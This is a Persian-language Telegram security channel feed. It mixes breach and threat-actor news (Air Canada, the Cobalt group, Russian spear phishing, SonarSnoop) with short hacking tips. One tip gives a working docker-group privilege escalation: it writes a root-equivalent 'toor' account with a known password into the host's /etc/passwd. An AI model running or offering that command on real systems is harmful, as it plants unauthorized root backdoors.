امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
Every consequence. Every key stroke. Everything has lead to this. The final season of #MrRobot arrives in 2019.

#news

@sec_nerd
اطلاعات ۲۰ هزار کاربر اپلیکیشن موبایلی Air Canada توسط هکرها مورد نفوذ قرار گرفت.
این رقم در حال زیاد شدن بود و هکر ناشناس قصد داشت وارد حسابهای بیشتری شود که با مشاهده لاگین های مشکوک، کارشناسان ایر کانادا حسابها را قفل و روند پیشرفت این هکر یا هکرها را متوقف کرده اند.

https://www.bleepingcomputer.com/news/security/air-canada-mobile-app-users-affected-by-data-breach/

#news
#breach
#canada


@sec_nerd
معرفی گروه هکرهای زیرزمینی Cobalt

این گروه برای نخستین بار در سال ۲۰۱۶ با سرقت پول نقد از دستگاه های خودپرداز با روش jackpotting شناسایی شد.
روش jackpotting با آلوده سازی دستگاه خودپرداز به بدافزار صورت میپذیرد.
گروه کبالت بصورت تخصصی سیستم های پرداخت، بانکها و سازمانهای تجاری را هدف قرار میدهد و این اهداف تاکنون در ۱۵ کشور قرار داشته اند.
در سال ۲۰۱۶ این هکرها تعداد زیادی ATM را در اروپا بصورت ریموت آلوده کردند. کشورهایی نظیر انگلیس، روسیه،رومانی، هلند، اسپانیا و ... از قربانیان این حمله بودند.
این بدافزار که بنظر میرسد ساخت گروه Buhtrap ATM gang باشد تنها از بانکهای روسیه، طی سالهای ۲۰۱۵ و ۲۰۱۶ مبلغ ۲۸ میلیون دلار سرقت کرد!
سال گذشته هکرهای کبالت با استفاده از آسیب پذیری CVE-2017-11882 که مربوط به آفیس بود و در تمامی نسخه های ویندوز کار میکرد، اقدام به ارسال ایمیل های فیشینگ و الصاق داکیومنتهای آلوده RTF و آلوده سازی اهداف خود کردند.
آنها در سال ۲۰۱۷ یک زنجیره تامین را در روسیه آلوده کردند. آنها همچنین از نسخه دستکاری شده باج افزار #petya برای پاک کردن ردپاهای خود استفاده میکردند.
در سال ۲۰۱۸ این هکرها بیکار نبودند و بازهم با هدف قراردادن کارمندان بانکها با حملات فیشینگ، سیستم های بانکی را آلوده کردند. آنها در طی یک عملیات دو ماهه موفق شدند مبلغ ۶۰۰ هزار دلار از بانکهای قزاقستان سرقت کنند.
در ماه آگوست نیز کبالت، دو بانک را در روسیه و رومانی مورد هدف قرار داد. در این حمله آنها از بکدورهای جاوا اسکریپتی استفاده کردند. در گامهای بعدی این بکدور اقدام به اتصال به دامینهای مختلف و دانلود فایلهای آپدیت و بدافزارهای دیگر میکند.



https://securityaffairs.co/wordpress/75793/cyber-crime/cobalt-campaign-russia-romania.html


#cobalt
#banking
#malware
#russia
#usa
#jackpotting

@sec_nerd
در لینک زیر خواهید دید چگونه میتوان با استفاده از موتور جستجوی shodan و یافتن دستگاههای Dreambox (دریم باکس شرکت تولید کننده رسیور و ست تاپ باکس است) در نهایت با توجه به وجود آسیب پذیری در این دستگاهها، قادر به اجرای دستور با سطح دسترسی روت خواهید بود.


https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/


#shodan
#iot
#rce
#dreambox
#pentest

@sec_nerd
اگر به یک سیستم لینوکسی دسترسی دارید و id کاربر شما نشان میدهد که شما عضو گروه docker نیز هستید، میتوانید با دستورات زیر سطح دسترسی خود را در کانتینرها به روت افزایش دهید:

$> docker run -it --rm -v $PWD:/mnt bash

دستور زیر حسابی با نام کاربری toor و پسورد password اضافه خواهد کرد:

#> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd


#docker
#linux
#privesc
#trick

@sec_nerd
گزارشات امریکایی ها نشان میدهد که روسها در حال فعالیت بر روی نقاط ضعف این کشور برای تاثیرگذاری بر روی انتخابات میان دوره ای هستند.
روش اصلی بکار گرفته شده توسط روسها spear phishing است که در آن ایمیلهایی حاوی لینکهایی به وبسایتهای جعلی قرار دارد. روسها با این روش موفق شدند کمیته ملی دموکراتها را پیش از این هک کنند.
با توجه به انتشار عمومی بدافزارهایی که از آژانس های اطلاعاتی دزدیده شده اند، حال هکرها میتوانند به راحتی اطلاعات ارزشمند و حجیمی را از افراد سرقت کنند. تنها هفته پیش مایکروسافت ۶ دامنه جعلی را که گویا توسط روسها رجیستر شده بودند بلاک کرد.
به لطف جهانی سازی نام دامنه ها، حالا به هر زبانی میتوان دامنه ساخت و این به هکرها کمک میکند تا با استفاده از علائم خاص (homoglyphs)‌ و گول زننده دامین های جعلی ای ثبت کنند که تشخیص آن در نگاه اول حتی برای کارشناسان امنیت و اینترنت نیز آسان نیست. (نمونه این مورد را در تبلیغ تلگرامی آدیداس و بی ام و دیده اید)
داستان زمانی تلخ تر میشود که این دامین های جعلی با گواهینامه های دیجیتال (https) اعتمادسازی بی نظیری را در قربانی خود ایجاد میکنند. برای مثال تنها در سال گذشته ۱۵ هزار وبسایت ترکیبی از نام paypal را داشتند و گواهینامه دیجیتال دریافت کرده بودند.
بنظر میرسد بکارگیری یک چارچوب شفافیت برای تشخیص اعتبار گواهینامه های دیجیتال و حتی نام دامنه ها و صفحات شبکه های اجتماعی الزامی میباشد.
در نهایت آموزش افراد بسیار حائز اهمیت بوده و باید در اولویت قرار گیرد.

منبع:
https://edition.cnn.com/2018/09/01/opinions/spear-phishing-has-become-even-more-dangerous-opinion-vishwanath/index.html


#news
#usa
#russia
#iran
#electron
#dnc
#spear_phishing

@sec_nerd
👍1
فایرفاکس در نسخه های بعدی خود تمامی اسکریپتهای ماینر را بلاک خواهد کرد!

https://bit.ly/2PwZlV7

#firefox
#miner
#btc
#malware
#coinhive

@sec_nerd
پیداکردن پروسه هایی که یک dll خاص را لود کرده اند، با استفاده از پاورشل

#ps
#windows
#tricks

@sec_nerd
مشاهده هیستوری دستورات در cmd

#windows
#cmd

@sec_nerd
محققان دانشگاهی در سوئد و انگلیس موفق شدند با استفاده از اسپیکرهای گوشی های همراه پترن های بازگشایی را بدست آورند.
ایده اصلی در این روش SonarSnoop نام دارد و موقعیت انگشت کاربر را بر روی صفحه دنبال میکند.
این تکنیک از یک برنامه جاسوس که امواج صوتی را از اسپیکرهای پایین و بالای گوشی ، در فرکانسهایی که قابل شنیدن نیست (بین ۱۸ تا ۲۰ کیلوهرتز) منتشر میکند، بهره میبرد.
سپس برنامه با دریافت انعکاس امواج منتشر شده، پس از برخورد با اشیاء نزدیک، که در این مورد انگشت کاربر است، دیتا را جمع آوری کرده و با استفاده از تکنیک های یادگیری ماشین پترن های ممکن برای بازگشایی گوشی را حدس میزند.
روش مذکور بر روی گوشی سامسونگ گلکسی اس ۴ با ورژن اندروید 5.0.1 آزمایش شده است.
ایده SonarSnoop هنوز در ابتدای راه است و برای کامل شدن نیاز به زمان دارد. ایده اولیه این طرح از FingerIO گرفته شده است. این ایده برای بهبود عملکرد ساعت های هوشمند بکار رفت بطوری که کاربر میتواند با کشیدن خطوط بر روی دست خود در نزدیکی ساعت هوشمند، پیامی را به ساعت ارسال کند که این پیام نوعی برقراری ارتباط غیرمستقیم با صفحه لمسی آن می باشد.



لینک مقاله منتشر شده:
https://arxiv.org/pdf/1808.10250v1.pdf


لینک خبر:
https://www.zdnet.com/article/sonarsnoop-attack-can-steal-smartphone-unlock-patterns/


#android
#iphone
#sonar
#misc

@sec_nerd